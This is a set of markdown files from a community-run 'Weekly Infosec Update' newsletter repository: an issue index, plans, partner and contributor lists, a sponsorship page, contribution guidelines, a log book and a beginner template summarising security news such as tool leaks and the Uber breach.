\nPreview\n\n - 1. CVE : poc exploit and analysis.\n - CVE Week → Day0* — Day0* Month 2022 \n - Security Patched\n - CVE: analysis & poc\n - CVE poc \n \n - 2. Secuirty & Researchers: AppSec, Red team, Blue team, threat intelligence, Malware, Ransomware etc \n - Infosec Business, funded and Market\n - Web Security and android security\n - Cloud Security\n - Blue/Red/Threat Intelligence Team\n \n - 3. News\n - DataBreach & Black Hat Hacker\n - Top 5 in Infosec\n - Twitter threads & Tips.\n - Hiring & Jobs\n - Event Recap.\n - Conferences\n - Webinars and videos\n - Ongoing/Upcomming 𝙀𝙑𝙀𝙉𝙏𝙎:\n \n - 4. Bug Bounty : reports, Write-ups and Resources.\n - Hackerone/Bugcrowd REPORT\n - Bug bounty writeups, tips & resources \n \n - 5. Tools, framework, RAT, Ransomware and malware\n - SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting : * Tool\n - Cloud Security : * Tool\n - Blue/Red Team/Threat intelligence : * Tool\n - Reverse engineering & OSINT : * Tool\n - IOT, OS & Hardware : * Tool \n \n - 6. How to get involve in Contribution and contributors.\n - Community Engagement Partners.\n - Team/contributors of #WeeklyInfosecUpdate.\n - Resource for Weekly infosec Update.\n \n - 7. Wrapping Up. :) \n\n
\n\n---\n\n# InfoSec community infused Weekly Update :\nID | Weekly Issue Number | Recap Week | Issued Date | \n|---|---|---|---|\n| 11 | [Weekly Issue 12](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_11.md) | 19th October 2022 - 25th october 2022 | 26th October 2022 | \n| 10 | [Weekly Issue 11](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_10.md) | 12 October 2022 - 18 october 2022 | 19 October 2022 | \n| 09 | [Weekly Issue 10](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_09.md) | 28 Sept 2022 - 11 October 2022 | 12 October 2022 | \n| 09 | [Weekly Issue 09](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_08.md) | 21 Sept 2022 - 27 Sept 2022 | 28 Sept 2022 | \n| 08 | [Weekly Issue 08](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_07.md) | 14 Sept 2022 - 20 Sept 2022 | 21 Sept 2022 | \n| 07 | [Weekly Issue 07](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_06.md) | 07 Sept 2022 - 13 Sept 2022 | 14 Sept 2022 | \n| 06 | [Weekly Issue 06](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_05.md) | 31st August - 06 September 2022 | 07 September 2022 | \n| 05 | [Weekly Issue 05](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_04.md) | 23rd August - 30th August 2022 | 31st August 2022 |\n| 04 | [Weekly Issue 04](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_03.md) | 16th August - 22nd August 2022 | 23th August 2022 |\n| 03 | [Weekly Issue 03](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_02.md) | 9th August - 15th August 2022 | 16th August 2022 |\n| 02 | [Weekly Issue 02](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_01.md) | 2nd August - 8th August 2022 | 9th August 2022 |\n| 01 | [Weekly Issue 01](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_00.md) | 25th July - 01st August 2022 | 02 August 2022 |\n\n \n#### Give a STAR if you appricaitae our work or Weekly InfoSec Update provide value to you. \n \n## In the future,\n\n 1. Weekly Infosec Update\n \n • Shifting to a website with freemium subscription model for #WeeklyInfosecUpdate.\n • Add more categories such as daily, Infosec Weekly, Developers Weekly and monthly Reccap.\n • Newsletter Service to Organization.\n \n 2. Create a public knowledge db\n \n • Make it a wiki\n • Crowdsorce the Content.\n \n
\nPreview\n\n Future plans detailed:\n 1. The final version of Weekly Infosec Update will be a website that will contain categorised content for Professional and beginners. it would be something like packetstorm, but only with useful information.\n \n There will be categories such as:\n • Daily infosec updates - may contain less important news, but on a daily basis\n • Weekly infosec updates - general weekly news \n • Monthly Infosec Updates - only the most important things that happened during a month\n • Breach news - big breaches\n • Critical news - news such as log4shell\n • New TTPs - new tactics techniques and procedures\n The list of categories may get bigger\n\n 2. Public knowledge DB\n \n - It would be something between mitre att&ck and an obsidian notebook. If you ever took notes while learning, you know what am i talking about. It will contain not only techniques like in mitre, but as well as POCs and explanation how it works + resources for more details. \n - The knowledge db will be a wiki, so anyone could contribute with their notes or blog posts. Every post will be categorised and chained like in obsidian notebook, so by reading a post, you will see many more posts related to the same subject. This way we will crowdsource our knowledge and help each other in our infosec journey\n \n 3. Offline Meeteups in City/country and support Cybersecurity project/event.\n \n 4. We're planning to start a Chapters for ResetHacker Community in different city and country so if you have expiriance with leading community, group and leaders do reach out to us at (resethackerofficial@gmail.com) and Capter name will be Eg : RH-County/City/Community/group/Team name.\n \n 5. Collebration with venue for Events.\n\n
\n \n#### Team/Volunteer Opportunities :\n

\n \n
\n\n If you want to get involved in making **Weekly Cybersecurity Update**, but aren't sure how ?\n CONTACT \"@Attr1b\" on Telegram or contact us through mail \"resethackerofficail@gmail.com\"\n \n \n
\nPreview\n \n - Wanna help our community to crowd source knowledge?\n \n - How can you contribute with us:\n \n - Help us gathering infosec news and update at the end of week.\n - Help us developing and/or maintaining both of our projects mentioned above.\n - Suggest something you would wanna see and how do you plan to improve. \n \n - We'll invite Volunteer to the Github as contributor so later you can add this project to your resume but if you think you can contribute otherwise or if you have some other idea that we can help you let me know as well.\n
\n \n #### 🤝🤝🤝 Researchers, community, groups and community engagement patners that Support Weekly Infosec Update 🤝🤝🤝\n \n
\nPreview\n\n- Huge thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\n - Contributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n\n- I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). Without their support distributing \"Weekly InfoSec Update\" among hackers would not have been possible.\n\n- Resources from [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) that help us drafting [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md).\n\n
\n\n#### Wrapping Up\n\n Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you.\n \n If you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them ??\n Thanks for reading!\n\n\n

\"RESETHACKER-COMMUNITY\"

\n" }, { "path": "ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md", "content": "## [Weekly_Infosec_Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/ResetCybersecuirty) Community Engagement partners.\n\nI'm so grateful to all the Organization, group, and community that support us for the engagement. Without their support reaching out to hackers would not have been possible.\n\nSupported By | Community, group and organization Server, channel and groups. \n-- | --\n[Hacker101 Discord](https://discord.gg/WrCTm8h) | This is the official HackerOne Hacker101 Server. If you want to learn to hack legally and earn cash you've come to the right place! \n//[HackTheBox Discord](https://discord.gg/FrRJ3Z8) | This server was created to bring together people that are passionate about security and hacking. We want to help them learn and further their education while having fun at the same time and meeting people from all around the world. Exchanging ideas, tips and experiences in a respectful way is all we are about. 😉//\n[TryHackMe Discord](https://discord.gg/KsAEejZ) | This discord is a dedicated community for the TryHackMe (THM) information security/hacking training website. We are not hackers for hire, requesting such will get you banned immediately.\n[Offensive Security Discord]() | The Offensive Community Platform was created to allow members to learn, share, and to connect with others on the Platform. This Platform allows Offsec Staff to share knowledge and communicate with members.\n[HackerSploit Discord](https://discord.gg/EFpBX3s4Cz) | This discord server is a hub for professionals, students, and hobbyists interested in learning, sharing, and collaborating. We want to keep it that way. This server promotes learning and the sharing of learning resources in all fields of Infosec and cybersecurity. \n[Bug Bounty Hunter Den](https://discord.com/invite/3B86tZa) | Bug Bounty Hunter Den (BBHD) is a discord server where bug bounty (BB) hunters (and also BB program organizers) can meet, discuss, share knowledge. It is also the first international discord server dedicated to bug bounties that is independent of any platform or program. We are trying to build a great bug bounty focused open community.\n[Stefan Rows Community]() | This Discord Server is meant to be a platform to exchange knowledge and help each other out. You can also use this server to reach out to Stefan directly or interact with stefan content or discuss any material found on ceos3c.com, twitch and YouTube Channel. \n[Nahamsec Discord](https://discord.gg/d6dENAq) | This Discord Server is meant to be a platform for bug hunters and colobrate each other out. You can also use this server to reach out to Nahamsec directly or interact with Nahamsec content or discuss any material found on Nahamsec.com, twitch and YouTube Channel. \n[RedBlue Private Discussion](t.me/Hide01Bot) | Create \"Better World\", You can do it RedBlue Team give you this power!\n[TCM Security Discord](https://discord.gg/b2CrWBcp) | \n[Bounty-hunters](https://discord.com/invite/EGnDD9A) |\n[The Cyber Council](https://discord.gg/NEcNJK4k9u) | The Cyber Council is a server for anyone interested in cybersecurity! Join to talk about CTFs, bug bounties, read news, and anything else that pertains to the field. We are a community of enthusiasts and learners who love meeting new people. Check it out today!\n\n---\n\n[0day.rocks Discord - Admin decided to Clsoe the server.]() | \n[HackerAssociation Discord - Still in Talk] | \n[Huntr - //Still in Talk//](https://discord.com/invite/zXVJPbT) |\n[Threathounds - Still in Talk]() | \n\n\n" }, { "path": "ResetCybersecuirty/SupportedBy/SponserUs.md", "content": "( Note :Currently We're not looking for any Sponsership. Thank you)\n\n# Sponsor & Support\nGrow your brand, generate leads, and fill your funnel.\n---\n### Become A Sponsor\nPLACE YOUR BRAND IN WEEKLY INFOSEC UPDATE\n\n\nAs a *WEEKLY INFOSEC UPDATE sponsor*, you get the opportunity to widen your brand and products among the community. \nYou will have maximum visibility with the logo of your company in our *Weekly release InfoSec* Newsletter and shared among professional community. \nThrough our sponsorship packages, your technology or product will get featured on our WEEKELY INFOSEC UPDATE and our Communiy Engagement Partners groups.\n\nBy investing in us, you are investing in the future of solving problem in Infosec Community and supporting the reaseacher work, inovative ideas and strategies to increasing digital awareness. \n\nYour investment in us allows us to have Sustainable development team, add more people for R&D, awareness and promote cybersecurity culture. \nYour help will also augment your company image as one that cares about the future for all of Infosec Security and community.\n\n---\n\n**WEEKLY INFOSEC UPDATE enables organizations to reachout to professionals in many ways:**\n- Maximize visibility with featured company logo placement on our Weekly release professional Newsletter.\n- Placement of company logo and website with news issue of Weekly infosec Update where Weekly infosec Update distributed amoung Community Engagement partners discord/telegram/slack server.\n- Great opportunities for business expansions, networking, and reaching out to professionals.\n- If your organization would like to be a part of Weekly InfoSec and get noticed among the key decision-makers and want to keep up with latest security.\n\n**Newsletter as Service:**\n- We have \"Business Orianted Monthy Newsletter\" to secure your cutting-edge technology or product and stay ahed of your competitors.\n- We have options to help you drafting their own Newsletter to reach your goals and to fit your budget.\n- kindly contact our Team at **resethackeroffical@gmail.com**\n\n**Stats from WEEKLY INFOSEC UPDATE**\n\n- 1,000+ Visiting to WEEKLY INFOSEC UPDATE every week.\n- 12+ \"Community engagement Partners\" to reach out to hackers that include organization, community and groups.\n- 7 Community leaders are working side by side to make \"WEEKLY INFOSEC UPDATE\" possible.\n \n- 3 most popular reasons to people visiting WEEKLY INFOSEC UPDATE & ResetHacker community.\n 1 Gain Knowledge and stay up to date with InfoSec Security.\n 2 Networking with community and job Opprtunity.\n 4 Promote company, community or their work.\n \n \n \n# SPONSORSHIP CONTACT\n\n Mr. Vicky Kumar\n Email: resethackeroffical@gmail.com\n For General Enquiries: twitter.com/resethacker\n\n\n \n*RESETHACKER Community* (Not active)\n\n 10 000+ : Instagram\n 1 600+ : Youtube\n 1 000+ : Discord \n 1 200+ : Telegram + Whatsapp Group\n\n\n---\n\nWe started working on \"Weekly Infosec Update\" open source newsletter because It's very time consuming to monitor the InfoSec Community on twitter, telegram, reddit. discord and visiting security website every day.\nwe’d end up releasing \"Weekly Infosec Update\" every Wednesday. \n\nIf I reach my goal of just $1000/month, I will be able to quit my job and do open source and independent security research full time!\n\nPaypal : https://paypal.me/Vicky481\n\n\n" }, { "path": "ResetCybersecuirty/SupportedBy/Suggestions.md", "content": "# Sugestions & Probelm:\n\n1. Make it more organized or Easy to read.\n2. TL;DR or Small summury to the article would be really impressive.\n3. Add Quote, Meme, attacktive picture etc.\n4. Make it Shorter and informative. \n5. Suggested name for **Weekly Infosec Update** \n \n Infosec CrowdSource,\n Infosec Recap or Infosec RECAP,\n Infosec Asset,\n Infosec Weekly or InfoSec Week..etc \n \n---\nHey, main thing I'd change is the structure itself. You have 6 sections. Why not make it 6 separate .md files? \n\nI honestly don't care about bug bounty or the hiring part. So having to scroll through it is a bit tedious.\nIf there was a main page with links to each sections, that'd be much better in my opinion. \n\nMaybe do a very quick introduction to what news are in each section on the main page.\nFor example:\nTWITTER, NEWS & DATA BREACH -> link here\n- Samsung data breach\n- TikTok possible breach\n- ...and more\n\nThen you click on the section and you have all the news from this section in more detail. \n\nAlso THE main thing that should be like NUMBER #1 is new vulnerabilities. \nI'd absolutely love a reliable place I can check every morning to see if there's some new vulnerability that I should be aware of as an engineer. \nNew tools, hiring, research, bug bounty reports...all that is nice to know. \nBut new vulnerabilities is an absolutely critical thing that every engineer working in cybersecurity has to follow. \n\nThat's my 2 cents, good luck with your project guys!\n\n---\n" }, { "path": "ResetCybersecuirty/SupportedBy/Team&Contributors.md", "content": "## WEEKLY INFOSEC UPDATE : v0.3\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n\nWe started working on [**Weekly Infosec Update**](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Readme.md) because It's very time consuming for professional to monitor the InfoSec Community on twitter, telegram, reddit. discord and visiting security website every day.\n\nWe had no idea we’d end up releasing \"Weekly Infosec Update\" every Wednesday. Huge thanks to our awesome Community Leader to contribution and giving back to community and thankyou for being the part of team.\n\n## Leaders and contributers of WEEKLY INFOSEC UPDATE \n| Leader Name | Description | Community/Group | Tags |\n| --- | --- | --- | --- | \n| [Good Resources Share](https://t.me/@Attr1b)|Moderator and contributor of Weekly Infosec Update | ResetHacker |`Infosec`|\n|[Paul Miller]|Community contributor and closely working on Crowdsource the Infosec resources and contributor of Weekly Infosec update.|Weekly Infosec Update |`Infosec`|\n|[Turang Parmar] |Security researchers, Pentester and give back to community at @bugbountytipstech |Bugbountytips.tech|`Bug Bounty`|\n|[Tuhin Bose] |Security researchers, Pentester and give back to community @Tuhin1729 | Tuhin1729 |`Bug Bounty`|\n|[Alexandre ZANNI a.k.a noraj] |Github Moderator of Weekly Security Update and giving back to community @inventory.raw.pm | inventory.raw.pm |`Cybersecurity`|\n[Vikram]|Founder of ResetHacker |ResetHacker |`Infosec`|\n[ph03n1x69]|Give back to community @zerodayforums | zerodayforums |`Infosec`|\n[Jonh Doe]| Red teamer and Give back to Community @Red-Team Community and former Adminstartor of 0day.rocks Server. | Red-Team Community |`RedTeam`|\n[h0nus] | Help Security researchers with resources such as Red Team, web app and reverse egnineering. | Creator of Pwn3rzs group and cyberarsenal forum |`RedTeam`|\n\n- Our Community Leaders Community and Group :\n\n- [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) - Our mission is to bring infosec community, group and leader together that solve community challenges, problems, create cultural and provide value to Infosec community.\n\n- [BugBountyTips.Tech]()\n\n- [Tuhin1729 Group]()\n\n- [Red-Team Community Discord]()\n\n- [Zeroday Forums]()\n\n- [Pwn3rzs](https://t.me/Pwn3rzs)\n\n\n\n\n\n\n" }, { "path": "ResetCybersecuirty/SupportedBy/Understanding.md", "content": "# Understanding community Operation and contributions:\n\nProject: **Weekly Inofsec update**\n\nProblem We're solving ? \nWe started working on \"Weekly Infosec Update\" because It's very time-consuming to monitor the InfoSec Community on Twitter, Telegram, Reddit, Slack, Discord, and visiting security website every day.\n\nGit repository: https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/ResetCybersecuirty\n\nTeam & Contributes: https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md **What type of help I want**: I am looking for collaborators and contributors on this project. We want to add Developers section. \nWhat type of help I want: I am looking for collaborators and contributors on this project. We want to add Developers section.\n\n------------------------------------\nCall for Volunteers at Null community\nDear All,\n\nAs the saying goes, “A Journey of a Thousand Miles Begins with a Single Step” two years ago started with many new initiatives with null. Some of the initiatives have delivered astonishing results. Below is a list of our small achievements.\n\nWe have published two white-papers on Crypto vulnerabilities \nhttps://github.com/null-open-security-community/Documentation/tree/master/null-Research-Papers/null-Crypto-Papers\n\nWe have published one white-paper on Cloud vulnerabilities.\nhttps://github.com/null-open-security-community/Documentation/tree/master/null-Research-Papers/Cloud-Security\n\nWe have started null Study Groups and have successfully been able to successfully run 10+ batches in two sprints. \nhttps://github.com/null-open-security-community/null-study-groups\n\nWe have re-developed the null jobs website\nhttps://jobs.null.community/\n\nWe have developed more than 10+ standard operating procedures to conduct various null events. https://github.com/null-open-security-community/Documentation\n\nWe have started null Webinar and virtual meet https://www.youtube.com/c/nullTheOpenSecurityCommunity/videos\n\nWe have started a null Clubhouse. We have 800+ members. We conduct regular weekly/monthly talks on null Clubhouse\nWe have started a null Telegram channel. We have 250+ members.\nWe have started a null Discord channel. We have 1000+ members in null Discord.\nYou can find the link of all our Social Media presence in below link\nhttps://linktr.ee/nullcommunity\n\nI believe we can achieve many more milestones with the help of extraordinary people like you. To take this effort forward and to reach new heights we are opening a new call for volunteers.\n\nWe hope to get lots of hearts and hands who believe in this cause and are willing to commit some of their precious time.\n----------------------------------------------------------------------------------\nRoles Available\nAspiring Product Manager (2 volunteers) \nSkill Set - Experience and knowledge product management\nRole - Building a product roadmap for null jobs portal and null.community website/Swachalit platform. Work with Design and Development team to deliver the new product features and enhancement.\n\nGrowth Hacker (2 volunteers) \nSkill Set - Experience and knowledge of Growth hacking skills like Analytics, Digital Marketing, Copywriting, A/B testing.\nRole - Development, and execution of Content Strategy, Digital Marketing Strategy to increase the null reach. Work with product and marketing team to brainstorm, implement and execute the growth strategy.\n\nUI/UX Designer (2 volunteers) \nSkill Set - Hands-on experience with Figma, Adobe XD, Sketch, or similar software.\nRole - Design new frontend for null.community website and null Swachalit platform.\n\nGraphics Designer (2 Volunteers)\nSkill Set - Hands-on experience Adobe Creative Cloud or similar software\nRole - Design Banners, Posters for null events. Video editing for null events, null study group website.\n\nFrontEnd Developer (2 volunteers) \nSkill Set - Hands-on experience on Angular or Vue or React\nRole - Develop a new frontend of null jobs portal and null website/Swachalit platform, null Study group.\n\nFullStack/Backend Developer (3 volunteers) \nSkill Set - Hands-on experience on Python + Django\nRole - Feature enhancement and bug fixing of null jobs portal (jobs.null.community)\n\nFullStack Developer (3 volunteers) \nSkill Set- Hands-on experience on Ruby on Rails \nRole - Feature enhancement and bug fixing of null.community website and null Swachalit platform.\n\nDiscord marketing executive (2 volunteers) \nSkill Set - Good understanding and knowledge of collaboration platforms like Discord, Slack, Rocketchat, or similar tools. Cybersecurity domain knowledge would be good.\nRole - Manage and promote null events, activities in the null Discord server, and other relevant collaboration platforms. Responsible for Discord user growth and active engagement with null Discord users.\n\nClubhouse marketing executive (2 volunteers) \nSkill Set - Digital Marketing experience and cybersecurity domain knowledge\nRole - Manage the null clubhouse account. Plan and promote regular weekly/bi-months sessions to engage with null clubhouse users. Work on increasing the null clubhouse followers.\n\nContent writer/reviewer (2 volunteers) \nSkill Set - Content writing experience in technology domain\nRole - Developing content strategy. Writing content related to null community activities, null success stories, null projects, and new initiatives. Content development for various social media platforms, blogs, and other relevant channels.\n\nTo know more about null volunteers benefits and expectation. Please check the below document.\nhttps://github.com/null-open-security-community/Documentation/blob/master/null-Guildeline-documents/null-Volunteer-onboarding-Handbook-2021.pdf\n" }, { "path": "ResetCybersecuirty/WIUAsset/Contribute.md", "content": "## India Centric Crowdsource InfoSec Community that make sence to Wrold.\n\n## Contribute & Give back to community | Crowdsource your learning with Us.\n##### Too long; didn't read (abbreviated TL;DR and tl;dr) is a shorthand notation added by an editor indicating that a passage appears too long to invest the time to digest it.\n\n- If you’re a professional or a passionate Contributor who beleive in giving back to community, you can apply to become a contributor and share TLDR or 15-55 words summary of writeups, Article, research, whitepapers, stat reports etc.\n\nOur audience:\n\n InfoSec Business Employee and leaders.\n Enthusiastic Ethical Hackers.\n Community Reseachers.\n Blue Team, Red team $ Threat Intelligence. \n Malaware Analysist.\n Pentesters & bug Hunters.\n Chief executive officers (CEOs)\n Chief financial officers (CFOs)\n Chief marketing officers (CMOs)\n Chief technology officers (CTOs)\n Chief information officers (CIOs)\n\nBefore you write: What we look for\n\n- If you’re serious about contributing and crowdsourcing your learning, please read through the guidelines and expectations in their entirety before submitting an TLDR or ARTICLE summary.\n\nLength: TLDR and Articles summury should range in length from 15-55 words, unless previously discussed.\n\n**Topics:**\n\n Bug bounty Article, Tips and resources\n CVE - Poc, analysis and exploit.\n Research, Whitepapers, Reports etc\n InfoSec Business, Technology & STARTUPS,\n Security Tools, malware, ransomeware, rat, databreach, leaks etc.\n Events, Jobs & Higher education (for example, excellent MBA programs, executive MBAs, top business schools, best universities, etc.)\n\nNote: selecting your topic: -Your selected topic has to fall under one or more of these categories. If you’re undecided, you can ask us for a topic/working title.\n\n \n\n TLDR or Articles summery must be unique, original, and exclusive to the INFOSEC WEEKLY UPDATE (i.e. you can’t republish the same TLDR/article/articles).\n The TLDR or Articles summary that you provide must not have been submitted, published, republished, or reprinted in other print/online publications.\n **The TLDR or Articles summary shouldn’t be too short, say less than 15 words, or too long, say over 55 words.**\n Content posted today should still be relevant within next week.\n Your TLDR or Articles summery should be marketing-neutral and written with an intent to add value to our readers.\n Write in clear, direct and succinct sentences. (i.e. don’t use big words to sound clever!)\n No defamatory or abusive content will be allowed, no matter how strong or justified your emotions or arguments are.\n You will be entirely liable for opinion pieces. So please research well for data and information before making claims and conclusions.\n If placement of links is your goal, then INFOSEC WEEKLY UPDATE is not a good fit for you, and it will save time for everyone if you look elsewhere.\n Avoid writing in a manner that is intellectually showy or arrogant.\n\nIdeas!\n\n #### INFOSEC WEEKLY UPDATE (Please checkout the Privious Issue.)\n #### Research, Whitepapers, case study, Statistics reports, Articles etc. \n #### Trend in infosec, DataBreach in Infosec, Security concern etc.\n #### Security patches and Update in Company such Apple, Android, google, facebook, instagram, microsoft, linux, github etc.\n #### Tips, How-tos or Beginner guides or How i find (You might be surprised to see the kind of things people are Googling.)\n #### Carrer Advice, Hirning etc.\n\n\nSubmission of TLDR or Articles summary.\n\n- You can send the final draft of your article for approval at resethackeroffical@gmail.com or talk to GOOD RESOURCES SHARE to add you to the WIU-RESOURCES group.\n\nThank you,\nEditorial team at the Weekly InfoSec Update.\n\n---\nNote: We do not accept links to Leaked Database, Illigal/cracked software, but you can make it in the News formate or TLDR formate or summary still the final decision regarding the tone and tenor of the TLDR rests with our editorial team. \n\nYou may push boundaries, but we will stick to some limits as set by the laws and our own editorial policies. \nInternet is a free space and you will get lot many platforms to share not verified links, tools and articles.\n" }, { "path": "ResetCybersecuirty/WIUAsset/Logs.md", "content": "# Log Book \n- 8/12/2022 : Added \"Bug Hunters Segment and Hackerone Reports Segment\" section inside \"Vulenrabilty/bugs Reoprts, Writeups explain and Anlalysis\"**\n- 8/15/2022 : In talk with : Vx_underground(Status:In Talk), Cyber_detective(Status: Busy), MalwareByte (Status: No), BugbountyTips(Status: Joined), Bugcround Unofficial(Status : No response) and Indivisuals(Status:2 Members). \n- 8/16/2022 : Changing the layout of Readme.md file.\n- 8/18/2022 : Community Review (Whatsapp, Telegram & discord) : Hackerone, bugcrowd, TCM, bugbunty, RedBlue, etc\n- 8/23/2022 : Based on the Community review:- Working on User friendly and readable format for \"Weekly Infosec Update\".\n- 8/28/2022 : Based on the Community review:- Working on making Weekly Infosec Update User friendly.(v0.3)\n- 9/02/2022 : Based on the Community review:- Working on making Weekly Infosec Update User friendly and shorter.(v.035)\n- 9/11/2022 : Based on the Community review:- Working on making Weekly Infosec Update easy to access by adding nevigation bar & priview. (v.04)\n- 9/15/2022 : Based on the Community review:- Working on making Weekly Infosec Update easy to access by adding priview. (v.045)\n//- 9/*/2022 : Get Featured on Blogs. (Status : Not started Yet)//\n\nTODO LIST :\n- 1. Categories Weekly update based on Domain (Eg: Pentesting, Soc, Reverse Enginnering, threat hunting etc)\n- 2. Awareness and community Partnership for Weekly infosec Update. (Eg Postswigger blog, Bugcrowd blog etc)\nAfter 10th Issue of Weekly Update :\n//- 3. Work on monetize or get sponshership from : Bugcrowd, intigriti, yeswehack, Hackerone, Tryhackme etc.\n- 4. Draft mail to approch (Status: Not started Yet) : Bugcrowd(Status:), Hackerone(Status: ), Intigiti(Status: ), BugbountyTips(Status: ) etc. \n- 4. Share Business Model with Weekly Infosec team and How we're going to monetize and provide service.//\n" }, { "path": "ResetCybersecuirty/WIUAsset/Readme.md", "content": "Working On\n" }, { "path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_Trail_Beginners.md", "content": "## Weekly Infosec Update - Beginners Friendly \n\n
\n\n📰📰📰 Community Infused NEWS 📰📰📰 \n\n
\n 1. Twiter Threads & Tips\n \n \n - 🟢 [LockBit ransomware group pays its first ever $50k bug bounty](https://twitter.com/ido_cohen2/status/1571039567666638848)\n - 🟢 On 12th Sept 2022 [idclickthat](https://twitter.com/idclickthat) tweeted about [Malware @Zoom downloads](https://twitter.com/idclickthat/status/1569350142230204421?t=_7lpBg7U-iokSMCGtSXZSw&s=19) On 19th Sept, Cyble Research and Intelligence Labs (CRIL) released a blog about @idclickthat tweet investigation and It turn out [New Malware Campaign Targets Zoom Users](https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/)\n - 🟢 @SamCurry received [2 crore from Google because of human error.😅](https://twitter.com/samwcyo/status/1569897392560050178?t=TROhjl9xQpcHnG3UOv_uow&s=19)\n - 🟢 [William Wallace](https://twitter.com/phyr3wall/) released his 1st youtube video on DNS Zone Takeovers](https://www.youtube.com/watch?v=DLNjP9KSgzA&feature=youtu.be)\n
\n \n
\n\n2. Data Breach & BlackHat Hackers Leaked\n \n \n - 🔴 **News - Paid Tools** that has been leaked or cracked by Black Hat Hackers : Cobaltstrike 4.7.1 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, acunetix_14.9.220913107, BurpSuite_pro_v2022_9.1,Acunetix Version 14 build 14.9.220713150 for Windows, Nessus Core + tenableSC 20220307 ISO & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, bruteratel 1.2.2, and 010 Editor 13.0-beta2.\n \n - 🔴 **News - Black Hat Hacker leaked** : GTA 6 has been leaked over onion browser, Conti source code for v3.7.7 and Taurus bot source code has been leaked. \n \n - 🔴 \"UBER GOT HACKED\". After few days Uber officially recorgnized the Data Breach and mentioned that Laplus$ group was behind the attack but Hacker group VX underground and indivisuals such as ColtonSeal, Kevin shared multiple SS where hacker claimed and mocked the security of Uber and shared the Unconfirmed method of breach:\n - Socially engineer an employee to get on their VPN (could have been prevented with webauthn / hardware 2fa)\n - Once on VPN, scan their intranet and find a network share \n - Network share has powershell scripts contained the username and password for a admin user in Thycotic (PAM) Using this hacker was able to extract secrets for all services, DA, DUO, Onelogin, AWS, GSuite\", domain admin, AWS instance, HackerOne administration panel, and more.\n - From there can get full access to all systems.\n - When the individual breached Uber, they sent a slack notification to everyone informing them the company had been breached.Employees thought it was a joke.\n
\n \n
